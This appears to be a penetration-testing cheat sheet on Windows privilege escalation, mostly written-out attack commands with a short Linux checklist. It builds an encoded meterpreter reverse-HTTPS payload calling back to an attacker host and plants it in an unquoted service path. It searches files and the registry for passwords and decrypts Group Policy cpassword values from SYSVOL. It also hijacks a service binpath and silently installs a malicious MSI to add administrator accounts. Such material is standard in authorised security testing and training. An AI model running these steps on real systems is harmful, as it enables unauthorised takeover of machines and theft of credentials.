Privilege Escalation
Contents
- 1 Windows Privilege Escalation Methods
- 1.1 Metasploit getsystem (From local admin to SYSTEM)
- 1.2 Unquoted Service Paths
- 1.3 Tokens
- 1.4 Hard coded credentials
- 1.5 Sensitive files on Desktop, Documents (xls, txt, )
- 1.6 DLL injection / hijacking
- 1.7 Unattended installation files (Unattend.xml)
- 1.8 GPP cracking
- 1.9 Weak services and bad permissions
- 1.10 AlwaysInstallElevated ON
- 1.11 Abusing scheduled tasks
- 1.12 Local exploits
- 2 Linux
Windows Privilege Escalation Methods
Metasploit getsystem (From local admin to SYSTEM)
To escalate privileges from local administrator to SYSTEM user:
meterpreter> use priv meterpreter> getsystem
getsystem uses three methods to achieve that, the first two using named pipe impersonation and the third one, using token duplication.
References:
- https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/
- https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/
Unquoted Service Paths
It happens when when a developer fails to enclose the file path to a service with quotes. File paths that are properly quoted are treated as absolute and therefore mitigate this vulnerability.
So:
C:\Program Files\Some Folder\Config files\Service.exe
Windows would try to execute:
C:\Program.exe C:\Program Files\Some.exe C:\Program Files\Some Folder\Config.exe C:\Program Files\Some Folder\Config files\Service.exe
So if we have write access on some target directory we can write a file on that directory:
C:>icacls "C:\Program Files\Some Folder"
(M) stands for Modify for (unprivileged) users
For a full list of icacls output description:
icacls preserves the canonical order of ACE entries as:
Explicit denials
Explicit grants
Inherited denials
Inherited grants
Perm is a permission mask that can be specified in one of the following forms:
A sequence of simple rights:
F (full access)
M (modify access)
RX (read and execute access)
R (read-only access)
W (write-only access)
A comma-separated list in parenthesis of specific rights:
D (delete)
RC (read control)
WDAC (write DAC)
WO (write owner)
S (synchronize)
AS (access system security)
MA (maximum allowed)
GR (generic read)
GW (generic write)
GE (generic execute)
GA (generic all)
RD (read data/list directory)
WD (write data/add file)
AD (append data/add subdirectory)
REA (read extended attributes)
WEA (write extended attributes)
X (execute/traverse)
DC (delete child)
RA (read attributes)
WA (write attributes)
Inheritance rights may precede either Perm form, and they are applied only to directories:
(OI): object inherit
(CI): container inherit
(IO): inherit only
(NP): do not propagate inherit
(I): permission inherited from parent container
To know in which privileges is the service running (hopefully as SYSTEM):
C:>wmic service get name,startname
Then we trojanize the service:
$msfvenom -p windows/meterpreter/reverse_https -e x86/shikata_ga_nai LHOST=$IP LPORT=443 -f exe -o Config.exe
And copy it to the folder we can write in:
C:>copy Config.exe C:\Program Files\Some Folder\
And sit and wait to the machine to be rebooted OR:
C:>shutdown /r /t 0
From metasploit:
msf>use exploit/windows/local/trusted_service_path
To exploit it manually:
C:>wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
C:>sc <servicename> stop & sc <servicename> start
Tokens
Take advantage of:
- SeImpersonatePrivilege
- SeAssignPrimaryPrivilege
Hard coded credentials
Commands:
C:>dir /s *pass* == *cred* == *vnc* == *.config*
C:>findstr /si password *.xml *.ini *.txt
C:>reg query HKLM /f password /t REG_SZ /s
C:>reg query HKCU /f password /t REG_SZ /s
Sensitive files on Desktop, Documents (xls, txt, )
Look Post exploitation
DLL injection / hijacking
Trusted directories: ``` HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\KnownDLLs HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SessionManager\SafeDllSearchMode HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\CWDIllegalInDllSearch ```
Unattended installation files (Unattend.xml)
- Unattended installs that were not cleaned properly can be abused.
- Mainly in those directories:
C:>dir C:\Windows\Panther\
C:>dir C:\Windows\Panther\Unattend\
C:>dir C:\Windows\System32\
C:>dir C:\Windows\System32\sysprep\
In addition to Unattend.xml files, be on the lookout for sysprep.xml and sysprep.inf
- From metasploit:
msf>use post/windows/gather/enum_unattend
GPP cracking
Group Policy Preferences (GPP) let you control computers in a number of ways. Think of them as unmanaged settings for your computers and users. It can be used also to set up accounts and/or passwords through the domain (i.e. same Administrator password to all the workstations of the domain).
These Group policy configuration files that could contain passwords (Groups.xml) are "encrypted" using a known AES key. And found in a shared folder inside the domain controller with read access to all domain authenticated users.
C:>net use z: \\<DC IP>\SYSVOL
SYSVOL is simply a folder which resides on each and every domain controller within the domain. It contains the domains public files that need to be accessed by clients and kept synchronised between domain controllers. The default location for the SYSVOL is C:\Windows\SYSVOL although it can be moved to another location during the promotion of a domain controller. It’s possible but not recommended to relocate the SYSVOL after DC promotion as there is potential for error. The SYSVOL folder can be accessed through its share \\domainname.com\sysvol or the local share name on the server \\servername\sysvol.
SYSVOL is the domain-wide share in Active Directory to which all authenticated users have read access.
By default there are two folders with a GUID name under C:\Windows\SYSVOL\domain\policies, representing two group policies (GPO). In any new domain environment we always get two default GPO’s, Default Domain Policy and Domain Controllers Policy.
To update your GPOs:
C:>gpupdate
To look your current assigned GPOs:
C:>gpresult /R
C:>dir /s Groups.xml
Other attack vector, more direct:
C:>findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
Once we get the hashed:
- In Linux:
C:>gpp-decrypt $AES_PASSWORD
- In Windows, use PowerSploit function Get-GPPPassword:
PS>Get-DecryptedCpassword $AES_PASSWORD
References:
- https://social.technet.microsoft.com/wiki/contents/articles/24160.active-directory-back-to-basics-sysvol.aspx
- https://adsecurity.org/?p=2288
Weak services and bad permissions
- Use AccessChk from sysinternals
- Which Services can be modified by any authenticated user (regardless of privilege level):
C:>accesschk.exe -uwcqv "Authenticated Users" * /accepteula
- List service parameters:
C:>accesschk.exe -ucqv [service_name]
- Find all weak folder permissions per drive:
C:>accesschk.exe -uwdqs Users c:\
C:>accesschk.exe -uwdqs "Authenticated Users" c:\
- Find all weak file permissions per drive:
C:>accesschk.exe -uwqs Users c:\*.*
C:>accesschk.exe -uwqs "Authenticated Users" c:\*.*
- Permissions on a specific folder:
C:>accesschk.exe Builtin\Users c:\inetpub
- Look at vulnerable service configuration parameters
C:>sc qc <service>
Locate interesting parameter, this is only an example
C:>sc config <service> binpath="net user alien alien /add"
C:>sc stop <service>
C:>sc start <service>
- From metasploit (post module):
msf>use exploit/windows/local/service_permissionsAlwaysInstallElevated ON
Allows any MSI executable be run as SYSTEM.
- Manual method:
C:>reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
C:>reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
- Metasploit
root #msfvenom -p windows/adduser USER=rottenadmin [email protected]! -f msi -o rotten.msi
root #msiexec /quiet /qn /i C:\Users\Steve.INFERNO\Downloads\rotten.msi
Another method with metasploit: If the machine has the AlwaysInstallElevated registry flag on, then just:
msf>use exploit/windows/local/always_install_elevated
Abusing scheduled tasks
C:>schtasks /query /fo LIST /v
C:>tasklist /SVC
Local exploits
msf>use exploit/windows/local/*
References:
- Alternative methods of becoming SYSTEM https://blog.xpnsec.com/becoming-system/
Linux
- Find setuids
- Find world writable directories
- Find world readable logs or backups
- Check crontab tasks
- Local exploits for kernel or applications
Look also Post exploitation
